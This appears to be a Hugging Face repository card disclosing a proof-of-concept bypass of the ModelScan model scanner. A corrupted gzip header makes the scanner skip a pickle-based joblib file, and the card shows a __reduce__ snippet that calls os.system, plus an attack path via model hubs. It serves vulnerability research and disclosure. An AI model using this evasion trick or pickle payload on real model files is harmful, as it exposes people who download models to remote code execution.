YAML Metadata
Warning:
empty or missing yaml metadata in repo card
(https://huggingface.co/docs/hub/model-cards#model-card-metadata)
ModelScan Bypass - Corrupt Compression Header
Security Research - ModelScan Bypass Technique
Overview
This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.
Technique
Malformed compression header
Gzip file with corrupted header (first byte modified to 0x00)
File
exploit_corrupt_header.joblib.gz
Reproduction Steps
Testing with ModelScan
# Install ModelScan
pip install modelscan
# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_corrupt_header.joblib.gz
Expected Result
SKIPPED - Scanner did not analyze this file
Triggering the Exploit
import joblib
# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_corrupt_header.joblib.gz')
Technical Details
This exploit uses Python's pickle __reduce__ method for RCE:
def __reduce__(self):
import os
return (os.system, ('echo "RCE executed!"',))
Why ModelScan misses this:
Gzip file with corrupted header (first byte modified to 0x00)
Security Impact
Severity: HIGH
Attack Vector:
- Attacker creates malicious model using this technique
- Uploads to model hub (HuggingFace, etc.)
- Victim downloads and scans with ModelScan
- Scanner reports "No issues found!" or skips the file
- Victim loads model → RCE
References
Inference Providers
NEW
This model isn't deployed by any Inference Provider.
🙋
Ask for provider support